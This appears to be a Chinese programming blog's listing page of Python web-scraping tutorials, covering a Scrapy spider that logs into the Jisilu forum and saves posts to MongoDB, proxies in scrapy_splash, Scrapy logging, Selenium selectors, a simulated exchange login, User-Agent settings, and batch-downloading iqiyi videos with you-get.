python爬虫集思录所有用户的帖子 scrapy写入mongodb数据库

李魔佛 发表了文章 • 0 个评论 • 121 次浏览 • 2018-09-02 21:52 • 来自相关话题

好久没更新了,把之前做的一些爬虫分享一下。不然都没有用户来了。-. -
 
项目采用scrapy的框架,数据写入到mongodb的数据库。 整个站点爬下来大概用了半小时,数据有12w条。
 
项目中的主要代码如下:
 
主spider# -*- coding: utf-8 -*-
import re
import scrapy
from scrapy import Request, FormRequest
from jsl.items import JslItem
from jsl import config
import logging

class AllcontentSpider(scrapy.Spider):
name = 'allcontent'

headers = {
'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Referer': 'https://www.jisilu.cn/login/',
'Accept-Encoding': 'gzip,deflate,br',
'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
}

def start_requests(self):
login_url = 'https://www.jisilu.cn/login/'
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}

yield Request(url=login_url, headers=headers, callback=self.login,dont_filter=True)

def login(self, response):
url = 'https://www.jisilu.cn/account/ajax/login_process/'
data = {
'return_url': 'https://www.jisilu.cn/',
'user_name': config.username,
'password': config.password,
'net_auto_login': '1',
'_post_type': 'ajax',
}

yield FormRequest(
url=url,
headers=self.headers,
formdata=data,
callback=self.parse,
dont_filter=True
)

def parse(self, response):
for i in range(1,3726):
focus_url = 'https://www.jisilu.cn/home/explore/sort_type-new__day-0__page-{}'.format(i)
yield Request(url=focus_url, headers=self.headers, callback=self.parse_page,dont_filter=True)

def parse_page(self, response):
nodes = response.xpath('//div[@class="aw-question-list"]/div')
for node in nodes:
each_url=node.xpath('.//h4/a/@href').extract_first()
yield Request(url=each_url,headers=self.headers,callback=self.parse_item,dont_filter=True)

def parse_item(self,response):
item = JslItem()
title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)

try:
content = ret[0].strip()
except:
content = None

createTime = response.xpath('//div[@class="aw-question-detail-meta"]/span/text()').extract_first()

resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')

url = response.url
item['title'] = title.strip()
item['content'] = content
try:
item['resp_no']=int(resp_no)
except Exception as e:
logging.warning('e')
item['resp_no']=None

item['createTime'] = createTime
item['url'] = url.strip()
resp =
for index,reply in enumerate(response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
rep_content = reply.xpath(
'.//div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first()
# print rep_content
agree=reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
resp.append({replay_user.strip()+'_{}'.format(index): [int(agree),rep_content.strip()]})

item['resp'] = resp
yield item




login函数是模拟登录集思录,通过抓包就可以知道一些上传的data。
然后就是分页去抓取。逻辑很简单。
 
然后pipeline里面写入mongodb。import pymongo
from collections import OrderedDict
class JslPipeline(object):
def __init__(self):
self.db = pymongo.MongoClient(host='10.18.6.1',port=27017)
# self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132
self.collection = self.db['db_parker']['jsl']
def process_item(self, item, spider):
self.collection.insert(OrderedDict(item))
return item
抓取到的数据入库mongodb:





 点击查看大图

原创文章
转载请注明出处:http://30daydo.com/publish/article/351
 
  查看全部
好久没更新了,把之前做的一些爬虫分享一下。不然都没有用户来了。-. -
 
项目采用scrapy的框架,数据写入到mongodb的数据库。 整个站点爬下来大概用了半小时,数据有12w条。
 
项目中的主要代码如下:
 
主spider
# -*- coding: utf-8 -*-
import re
import scrapy
from scrapy import Request, FormRequest
from jsl.items import JslItem
from jsl import config
import logging

class AllcontentSpider(scrapy.Spider):
name = 'allcontent'

headers = {
'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Referer': 'https://www.jisilu.cn/login/',
'Accept-Encoding': 'gzip,deflate,br',
'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
}

def start_requests(self):
login_url = 'https://www.jisilu.cn/login/'
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}

yield Request(url=login_url, headers=headers, callback=self.login,dont_filter=True)

def login(self, response):
url = 'https://www.jisilu.cn/account/ajax/login_process/'
data = {
'return_url': 'https://www.jisilu.cn/',
'user_name': config.username,
'password': config.password,
'net_auto_login': '1',
'_post_type': 'ajax',
}

yield FormRequest(
url=url,
headers=self.headers,
formdata=data,
callback=self.parse,
dont_filter=True
)

def parse(self, response):
for i in range(1,3726):
focus_url = 'https://www.jisilu.cn/home/explore/sort_type-new__day-0__page-{}'.format(i)
yield Request(url=focus_url, headers=self.headers, callback=self.parse_page,dont_filter=True)

def parse_page(self, response):
nodes = response.xpath('//div[@class="aw-question-list"]/div')
for node in nodes:
each_url=node.xpath('.//h4/a/@href').extract_first()
yield Request(url=each_url,headers=self.headers,callback=self.parse_item,dont_filter=True)

def parse_item(self,response):
item = JslItem()
title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)

try:
content = ret[0].strip()
except:
content = None

createTime = response.xpath('//div[@class="aw-question-detail-meta"]/span/text()').extract_first()

resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')

url = response.url
item['title'] = title.strip()
item['content'] = content
try:
item['resp_no']=int(resp_no)
except Exception as e:
logging.warning('e')
item['resp_no']=None

item['createTime'] = createTime
item['url'] = url.strip()
resp =
for index,reply in enumerate(response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
rep_content = reply.xpath(
'.//div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first()
# print rep_content
agree=reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
resp.append({replay_user.strip()+'_{}'.format(index): [int(agree),rep_content.strip()]})

item['resp'] = resp
yield item




login函数是模拟登录集思录,通过抓包就可以知道一些上传的data。
然后就是分页去抓取。逻辑很简单。
 
然后pipeline里面写入mongodb。
import pymongo
from collections import OrderedDict
class JslPipeline(object):
def __init__(self):
self.db = pymongo.MongoClient(host='10.18.6.1',port=27017)
# self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132
self.collection = self.db['db_parker']['jsl']
def process_item(self, item, spider):
self.collection.insert(OrderedDict(item))
return item

抓取到的数据入库mongodb:

记实录.PNG

 点击查看大图

原创文章
转载请注明出处:http://30daydo.com/publish/article/351
 
 

how to use proxy in scrapy_splash ?

李魔佛 发表了文章 • 0 个评论 • 167 次浏览 • 2018-08-24 21:44 • 来自相关话题

方法一;
yield scrapy.Request(
url=self.base_url.format(i),
meta={'page':str(i),
'splash': {
'args': {
'images':0,
'wait': 15,
'proxy': self.get_proxy(),
},
'endpoint': 'render.html',
},
},
)

其中get_proxy() 返回的是 字符创,类似于 http://8.8.8.8.8:8888 这样的格式代理数据。
这个方式自己试过是可以使用的。
 
当然也可以使用 scrapy_splash 中的 SplashRequest方法进行调用,参数一样,只是位置有点变化。
 
方法二是写中间件,不过自己试了很多次,没有成功。 感觉网上的都是忽悠。
就是在 process_request中修改 request['splash']['args']['proxy']=xxxxxxx
无效,另外一个朋友也沟通过,也是说无法生效。
 
如果有人成功了的话,可以私信交流交流。
  查看全部
方法一;
yield scrapy.Request(
url=self.base_url.format(i),
meta={'page':str(i),
'splash': {
'args': {
'images':0,
'wait': 15,
'proxy': self.get_proxy(),
},
'endpoint': 'render.html',
},
},
)


其中get_proxy() 返回的是 字符创,类似于 http://8.8.8.8.8:8888 这样的格式代理数据。
这个方式自己试过是可以使用的。
 
当然也可以使用 scrapy_splash 中的 SplashRequest方法进行调用,参数一样,只是位置有点变化。
 
方法二是写中间件,不过自己试了很多次,没有成功。 感觉网上的都是忽悠。
就是在 process_request中修改 request['splash']['args']['proxy']=xxxxxxx
无效,另外一个朋友也沟通过,也是说无法生效。
 
如果有人成功了的话,可以私信交流交流。
 

scrapy记录日志的最新方法

李魔佛 发表了文章 • 0 个评论 • 130 次浏览 • 2018-08-15 15:01 • 来自相关话题

旧的方法:from scrapy import log
log.msg("This is a warning", level=log.WARING)

在Spider中添加log

在spider中添加log的推荐方式是使用Spider的 log() 方法。该方法会自动在调用 scrapy.log.start() 时赋值 spider 参数。

其它的参数则直接传递给 msg() 方法

 

scrapy.log模块scrapy.log.start(logfile=None, loglevel=None, logstdout=None)启动log功能。该方法必须在记录任何信息之前被调用。否则调用前的信息将会丢失。

但是运行的时候出现警告:

[py.warnings] WARNING: E:\git\CrawlMan\bilibili\bilibili\spiders\bili.py:14: ScrapyDeprecationWarning: log.msg has been deprecated, create a python logger and log through it instead
log.msg

原来官方以及不推荐使用log.msg了


最新的用法:# -*- coding: utf-8 -*-
import scrapy
from scrapy_splash import SplashRequest
import logging
# from scrapy import log
class BiliSpider(scrapy.Spider):
name = 'ordinary' # 这个名字就是上面连接中那个启动应用的名字
allowed_domain = ["bilibili.com"]
start_urls = [
"https://www.bilibili.com/"
]

def parse(self, response):
logging.info('====================================================')
content = response.xpath("//div[@class='num-wrap']").extract_first()
logging.info(content)
logging.info('====================================================') 查看全部
旧的方法:
from scrapy import log
log.msg("This is a warning", level=log.WARING)

在Spider中添加log

在spider中添加log的推荐方式是使用Spider的 log() 方法。该方法会自动在调用 scrapy.log.start() 时赋值 spider 参数。

其它的参数则直接传递给 msg() 方法

 

scrapy.log模块scrapy.log.start(logfile=None, loglevel=None, logstdout=None)启动log功能。该方法必须在记录任何信息之前被调用。否则调用前的信息将会丢失。

但是运行的时候出现警告:

[py.warnings] WARNING: E:\git\CrawlMan\bilibili\bilibili\spiders\bili.py:14: ScrapyDeprecationWarning: log.msg has been deprecated, create a python logger and log through it instead
log.msg


原来官方以及不推荐使用log.msg了


最新的用法:
# -*- coding: utf-8 -*-
import scrapy
from scrapy_splash import SplashRequest
import logging
# from scrapy import log
class BiliSpider(scrapy.Spider):
name = 'ordinary' # 这个名字就是上面连接中那个启动应用的名字
allowed_domain = ["bilibili.com"]
start_urls = [
"https://www.bilibili.com/"
]

def parse(self, response):
logging.info('====================================================')
content = response.xpath("//div[@class='num-wrap']").extract_first()
logging.info(content)
logging.info('====================================================')

想写一个爬取开奖数据并预测下一期的py

李魔佛 回复了问题 • 2 人关注 • 1 个回复 • 185 次浏览 • 2018-08-10 00:22 • 来自相关话题

最新版的chrome中info lite居然不支持了

李魔佛 发表了文章 • 0 个评论 • 219 次浏览 • 2018-06-25 18:58 • 来自相关话题

更新到了v67版本后,info lite居然不见了. 我晕.
只好降级......
 
版本 65.0.3325.162(正式版本) (64 位)
这个版本最新且支持info lite的。
 
 
更新到了v67版本后,info lite居然不见了. 我晕.
只好降级......
 
版本 65.0.3325.162(正式版本) (64 位)
这个版本最新且支持info lite的。
 
 

Message: invalid selector: Compound class names not permitted

李魔佛 发表了文章 • 0 个评论 • 718 次浏览 • 2018-01-30 00:59 • 来自相关话题

使用selenium的时候如果使用了
driver.find_element_by_class_name("content")
使用class名字来查找元素的话,就会出现
Message: invalid selector: Compound class names not permitted
这个错误。
 
比如京东的登录页面中:
<div id="content">
<div class="login-wrap">
<div class="w">
<div class="login-form">
<div class="login-tab login-tab-l">
<a href="javascript:void(0)" clstag="pageclick|keycount|201607144|1"> 扫码登录</a>
</div>
<div class="login-tab login-tab-r">
<a href="javascript:void(0)" clstag="pageclick|keycount|201607144|2">账户登录</a>
</div>
<div class="login-box">
<div class="mt tab-h">
</div>
<div class="msg-wrap">
<div class="msg-error hide"><b></b></div>
</div>

我要找的是<div class="login-tab login-tab-l">
 
那么应该使用css选择器:

browser.find_element_by_css_selector('div.login-tab.login-tab-r')
  查看全部
使用selenium的时候如果使用了
driver.find_element_by_class_name("content")
使用class名字来查找元素的话,就会出现
Message: invalid selector: Compound class names not permitted
这个错误。
 
比如京东的登录页面中:
<div id="content">
<div class="login-wrap">
<div class="w">
<div class="login-form">
<div class="login-tab login-tab-l">
<a href="javascript:void(0)" clstag="pageclick|keycount|201607144|1"> 扫码登录</a>
</div>
<div class="login-tab login-tab-r">
<a href="javascript:void(0)" clstag="pageclick|keycount|201607144|2">账户登录</a>
</div>
<div class="login-box">
<div class="mt tab-h">
</div>
<div class="msg-wrap">
<div class="msg-error hide"><b></b></div>
</div>

我要找的是<div class="login-tab login-tab-l">
 
那么应该使用css选择器:

browser.find_element_by_css_selector('div.login-tab.login-tab-r')
 

python模拟登录vexx.pro 获取你的总资产/币值和其他个人信息

李魔佛 发表了文章 • 0 个评论 • 887 次浏览 • 2018-01-10 03:22 • 来自相关话题

因为每次登录vexx.pro,第一次输入正常的验证码都会说你是错误的,搞得每次都要输入2次验证码,所以为了节省点时间,就写了个模拟登录来自动获取自己的账户信息的python程序。
 



# -*-coding=utf-8-*-

import requests
session = requests.Session()
user = ''
password = ''

def getCode():
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'}
url = 'http://vexx.pro/verify/code.html'
s = session.get(url=url, headers=headers)

with open('code.png', 'wb') as f:
f.write(s.content)

code = raw_input('input the code: ')
print 'code is ', code

login_url = 'http://vexx.pro/login/up_login.html'
post_data = {
'moble': user,
'mobles': '+86',
'password': password,
'verify': code,
'login_token': ''}

login_s = session.post(url=login_url, headers=header, data=post_data)
print login_s.status_code

zzc_url = 'http://vexx.pro/ajax/check_zzc/'
zzc_s = session.get(url=zzc_url, headers=headers)
print zzc_s.text

def main():
getCode()

if __name__ == '__main__':
main()



把自己的用户名和密码填上去,中途输入一次验证码。
可以把session保存到本地,然后下一次就可以不用再输入密码。 
 
后记: 经过几个月后,这个网站被证实是一个圈钱跑路的网站,目前已经无法正常登陆了。希望大家不要再上当了
原创地址:http://30daydo.com/article/263
转载请注明出处。 查看全部
因为每次登录vexx.pro,第一次输入正常的验证码都会说你是错误的,搞得每次都要输入2次验证码,所以为了节省点时间,就写了个模拟登录来自动获取自己的账户信息的python程序。
 
snipaste_20180110_031813.png
# -*-coding=utf-8-*-

import requests
session = requests.Session()
user = ''
password = ''

def getCode():
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'}
url = 'http://vexx.pro/verify/code.html'
s = session.get(url=url, headers=headers)

with open('code.png', 'wb') as f:
f.write(s.content)

code = raw_input('input the code: ')
print 'code is ', code

login_url = 'http://vexx.pro/login/up_login.html'
post_data = {
'moble': user,
'mobles': '+86',
'password': password,
'verify': code,
'login_token': ''}

login_s = session.post(url=login_url, headers=header, data=post_data)
print login_s.status_code

zzc_url = 'http://vexx.pro/ajax/check_zzc/'
zzc_s = session.get(url=zzc_url, headers=headers)
print zzc_s.text

def main():
getCode()

if __name__ == '__main__':
main()



把自己的用户名和密码填上去,中途输入一次验证码。
可以把session保存到本地,然后下一次就可以不用再输入密码。 
 
后记: 经过几个月后,这个网站被证实是一个圈钱跑路的网站,目前已经无法正常登陆了。希望大家不要再上当了
原创地址:http://30daydo.com/article/263
转载请注明出处。

[scrapy]修改爬虫默认user agent的多种方法

李魔佛 发表了文章 • 0 个评论 • 1914 次浏览 • 2017-12-14 16:22 • 来自相关话题

1. 创建scrapy项目:scrapy startproject headerchange2. 创建爬虫文件scrapy genspider headervalidation helloacm.com
3. 目标站点:

https://helloacm.com/api/user-agent/

这一个站点直接返回用户的User-Agent, 这样你就可以直接查看你的User-Agent是否设置成功。
尝试用浏览器打开网址 
https://helloacm.com/api/user-agent/,

网站直接返回:  
"Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.3202.94 Safari\/537.36"
 
3. 配置scrapy
在spider文件夹的headervalidation.py 修改为一下内容。class HeadervalidationSpider(scrapy.Spider):
name = 'headervalidation'
allowed_domains = ['helloacm.com']
start_urls = ['http://helloacm.com/api/user-agent/']

def parse(self, response):
print '*'*20
print response.body
print '*'*20
项目只是打印出response的body,也就是打印出访问的User-Agent信息。
 
运行:scrapy crawl headervalidation会发现返回的是503。 接下来,我们修改scrapy的User-Agent
 
方法1:
修改setting.py中的User-Agent# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Hello World'
然后重新运行scrapy crawl headervalidation
这个时候,能够看到正常的scrapy输出了。2017-12-14 16:17:35 [scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023
2017-12-14 16:17:35 [scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (301) to <GET https://helloacm.com/api/us
er-agent/> from <GET http://helloacm.com/api/user-agent/>
2017-12-14 16:17:36 [scrapy.core.engine] DEBUG: Crawled (200) <GET https://helloacm.com/api/user-agent/> (referer: None)

[b]********************
"Hello World"
********************
[/b]2017-12-14 16:17:37 [scrapy.core.engine] INFO: Closing spider (finished)
2017-12-14 16:17:37 [scrapy.statscollectors] INFO: Dumping Scrapy stats:
{'downloader/request_bytes': 406,
'downloader/request_count': 2,
'downloader/request_method_count/GET': 2,
'downloader/response_bytes': 796,
'downloader/response_count': 2,
'downloader/response_status_count/200': 1,
'downloader/response_status_count/301': 1,
'finish_reason': 'finished',
'finish_time': datetime.datetime(2017, 12, 14, 8, 17, 37, 29000),
'log_count/DEBUG': 3,
'log_count/INFO': 7,
'response_received_count': 1,
'scheduler/dequeued': 2,
'scheduler/dequeued/memory': 2,
'scheduler/enqueued': 2,
'scheduler/enqueued/memory': 2,
'start_time': datetime.datetime(2017, 12, 14, 8, 17, 35, 137000)}
2017-12-14 16:17:37 [scrapy.core.engine] INFO: Spider closed (finished)
 
正确设置了User-Agent
 
方法2.
修改setting中的
DEFAULT_REQUEST_HEADERS# Override the default request headers:
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en',
'User-Agent':'Hello World'
}
运行后也能够看到上面的输出。
 
 
方法3.
在代码中修改。class HeadervalidationSpider(scrapy.Spider):
name = 'headervalidation'
allowed_domains = ['helloacm.com']


def start_requests(self):
header={'User-Agent':'Hello World'}
yield scrapy.Request(url='http://helloacm.com/api/user-agent/',headers=header)

def parse(self, response):
print '*'*20
print response.body
print '*'*20
运行后也能够看到下面的输出。2017-12-14 16:17:35 [scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023
2017-12-14 16:17:35 [scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (301) to <GET https://helloacm.com/api/us
er-agent/> from <GET http://helloacm.com/api/user-agent/>
2017-12-14 16:17:36 [scrapy.core.engine] DEBUG: Crawled (200) <GET https://helloacm.com/api/user-agent/> (referer: None)

********************
"Hello World"
********************
2017-12-14 16:17:37 [scrapy.core.engine] INFO: Closing spider (finished)
2017-12-14 16:17:37 [scrapy.statscollectors] INFO: Dumping Scrapy stats:
 
方法4.
在中间件中自定义Header
 
在项目目录下添加一个目录:
customerMiddleware,在目录中新建一个自定义的中间件文件:
文件名随意为 customMiddleware.py
 
文件内容为修改request User-Agent#-*-coding=utf-8-*-
from scrapy.contrib.downloadermiddleware.useragent import UserAgentMiddleware

class CustomerUserAgent(UserAgentMiddleware):
def process_request(self, request, spider):
ua='HELLO World?????????'
request.headers.setdefault('User-Agent',ua)
 
在setting中添加下面一句,以便使中间件生效。DOWNLOADER_MIDDLEWARES = {
'headerchange.customerMiddleware.customMiddleware.CustomerUserAgent':10
# 'headerchange.middlewares.MyCustomDownloaderMiddleware': 543,
}
然后重新运行,同样能够得到一样的效果。
 
原创文章,转载请注明:http://30daydo.com/article/245 

附上github的源码:https://github.com/Rockyzsu/base_function/tree/master/scrapy_demo/headerchange 
欢迎star和点赞。







如果你觉得文章对你有用,可以视乎你心情来打赏,以支持小站的服务器网络费用。
你的支持是我最大的动力!
 
PS:谢谢下面朋友的打赏
A Keung
阿贾克斯
白驹过隙
Che Long 查看全部
1. 创建scrapy项目:
scrapy startproject headerchange
2. 创建爬虫文件
scrapy genspider headervalidation helloacm.com

3. 目标站点:

https://helloacm.com/api/user-agent/

这一个站点直接返回用户的User-Agent, 这样你就可以直接查看你的User-Agent是否设置成功。
尝试用浏览器打开网址 
https://helloacm.com/api/user-agent/,

网站直接返回:  
"Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.3202.94 Safari\/537.36"
 
3. 配置scrapy
在spider文件夹的headervalidation.py 修改为一下内容。
class HeadervalidationSpider(scrapy.Spider):
name = 'headervalidation'
allowed_domains = ['helloacm.com']
start_urls = ['http://helloacm.com/api/user-agent/']

def parse(self, response):
print '*'*20
print response.body
print '*'*20

项目只是打印出response的body,也就是打印出访问的User-Agent信息。
 
运行:
scrapy crawl headervalidation
会发现返回的是503。 接下来,我们修改scrapy的User-Agent
 
方法1:
修改setting.py中的User-Agent
# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Hello World'

然后重新运行
scrapy crawl headervalidation

这个时候,能够看到正常的scrapy输出了。
2017-12-14 16:17:35 [scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023
2017-12-14 16:17:35 [scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (301) to <GET https://helloacm.com/api/us
er-agent/> from <GET http://helloacm.com/api/user-agent/>
2017-12-14 16:17:36 [scrapy.core.engine] DEBUG: Crawled (200) <GET https://helloacm.com/api/user-agent/> (referer: None)

[b]********************
"Hello World"
********************
[/b]2017-12-14 16:17:37 [scrapy.core.engine] INFO: Closing spider (finished)
2017-12-14 16:17:37 [scrapy.statscollectors] INFO: Dumping Scrapy stats:
{'downloader/request_bytes': 406,
'downloader/request_count': 2,
'downloader/request_method_count/GET': 2,
'downloader/response_bytes': 796,
'downloader/response_count': 2,
'downloader/response_status_count/200': 1,
'downloader/response_status_count/301': 1,
'finish_reason': 'finished',
'finish_time': datetime.datetime(2017, 12, 14, 8, 17, 37, 29000),
'log_count/DEBUG': 3,
'log_count/INFO': 7,
'response_received_count': 1,
'scheduler/dequeued': 2,
'scheduler/dequeued/memory': 2,
'scheduler/enqueued': 2,
'scheduler/enqueued/memory': 2,
'start_time': datetime.datetime(2017, 12, 14, 8, 17, 35, 137000)}
2017-12-14 16:17:37 [scrapy.core.engine] INFO: Spider closed (finished)

 
正确设置了User-Agent
 
方法2.
修改setting中的
DEFAULT_REQUEST_HEADERS
# Override the default request headers:
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en',
'User-Agent':'Hello World'
}

运行后也能够看到上面的输出。
 
 
方法3.
在代码中修改。
class HeadervalidationSpider(scrapy.Spider):
name = 'headervalidation'
allowed_domains = ['helloacm.com']


def start_requests(self):
header={'User-Agent':'Hello World'}
yield scrapy.Request(url='http://helloacm.com/api/user-agent/',headers=header)

def parse(self, response):
print '*'*20
print response.body
print '*'*20

运行后也能够看到下面的输出。
2017-12-14 16:17:35 [scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023
2017-12-14 16:17:35 [scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (301) to <GET https://helloacm.com/api/us
er-agent/> from <GET http://helloacm.com/api/user-agent/>
2017-12-14 16:17:36 [scrapy.core.engine] DEBUG: Crawled (200) <GET https://helloacm.com/api/user-agent/> (referer: None)

********************
"Hello World"
********************
2017-12-14 16:17:37 [scrapy.core.engine] INFO: Closing spider (finished)
2017-12-14 16:17:37 [scrapy.statscollectors] INFO: Dumping Scrapy stats:

 
方法4.
在中间件中自定义Header
 
在项目目录下添加一个目录:
customerMiddleware,在目录中新建一个自定义的中间件文件:
文件名随意为 customMiddleware.py
 
文件内容为修改request User-Agent
#-*-coding=utf-8-*-
from scrapy.contrib.downloadermiddleware.useragent import UserAgentMiddleware

class CustomerUserAgent(UserAgentMiddleware):
def process_request(self, request, spider):
ua='HELLO World?????????'
request.headers.setdefault('User-Agent',ua)

 
在setting中添加下面一句,以便使中间件生效。
DOWNLOADER_MIDDLEWARES = {
'headerchange.customerMiddleware.customMiddleware.CustomerUserAgent':10
# 'headerchange.middlewares.MyCustomDownloaderMiddleware': 543,
}

然后重新运行,同样能够得到一样的效果。
 
原创文章,转载请注明:http://30daydo.com/article/245 

附上github的源码:https://github.com/Rockyzsu/base_function/tree/master/scrapy_demo/headerchange 
欢迎star和点赞。


mm_facetoface_collect_qrcode_1513241363991_副本1_副本_副本.png


如果你觉得文章对你有用,可以视乎你心情来打赏,以支持小站的服务器网络费用。
你的支持是我最大的动力!
 
PS:谢谢下面朋友的打赏
A Keung
阿贾克斯
白驹过隙
Che Long

儿歌多多 下载全部儿歌视频文件

李魔佛 发表了文章 • 0 个评论 • 1425 次浏览 • 2017-09-28 23:44 • 来自相关话题

等有空的时候实现这个功能。
嗅探app的下载路径,然后抓取数据
 
http://30daydo.com/article/236 

更新 ******** 2018-01-09*************
最近才发现以前曾经挖了这个坑,现在来完成它吧。
 
儿歌多多在爱奇艺的视频网站上也有全集,所以目标转为抓取iqiyi的儿歌多多视频列表。 
github上有一个现成的下载iqiyi的第三方库,可以通过python调用这个库来实现下载功能。
 
代码使用python3来实现。
 
1. 打开网页 http://www.iqiyi.com/v_19rrkwcx6w.html#curid=455603300_26b870cbb10342a6b8a90f7f0b225685
 
这个是第一集的儿歌多多,url后面的curid只是一个随机的字符串,可以直接去掉。
 
url=“http://www.iqiyi.com/v_19rrkwcx6w.htm”
浏览器直接查看源码,里面直接包含了1-30集的视频url,那么要做的就是提取这30个url
 
先抓取网页内容:session = requests.Session()
def getContent(url):
try:
ret = session.get(url)
except:
return None
if ret.status_code==200:
return ret.text
else:
return None
然后提取内容中的url





点击查看大图

提取div标签中的属性 data-current-count=1的。然后选择子节点中的li标签,提取li中的a中的href链接即可。 content = getContent(url)
root = etree.HTML(content)
elements=root.xpath('//div[@data-current-count="1"]//li/a/@href')
for items in elements:
song_url = items.replace('//','')
song_url=song_url.strip()
print(song_url)





2. 有了url,就可以下载这个页面的中的内容了。
这里我使用的是一个第三方的视频下载库,you-get。(非常好用,fork到自己仓库研究 https://github.com/Rockyzsu/you-get)
 
使用方法:

python you-get -d --format=HD url
 
you-get 需要下载一个ffmpeg.exe的文件来解码视频流的,去官网就可以免费下载。
 
url就是你要下载的url地址,format可以选择高清还是其他格式的,我这里选择的是HD。
 
在python脚本里面调用另外一个python脚本,可以使用subprocess来调用。 p=subprocess.Popen('python you-get -d --format=HD {}'.format(song_url),stderr=subprocess.PIPE,stdout=subprocess.PIPE,shell=True)
output,error = p.communicate()
print(output)
print(error)
p.wait()
上面的song_url 就是接着最上面那个代码的。
 
 
完整代码如下:#-*-coding=utf-8-*-
import requests
from lxml import etree
import subprocess
session = requests.Session()
def getContent(url):
# url='http://www.iqiyi.com/v_19rrkwcx6w.html'
try:
ret = session.get(url)
# except Exception,e:
except:
# print e
return None
if ret.status_code==200:
return ret.text
else:
return None

def getUrl():
url='http://www.iqiyi.com/v_19rrkwcx6w.html'
url2='http://www.iqiyi.com/v_19rrl2td7g.html' # 31-61
content = getContent(url)
root = etree.HTML(content)
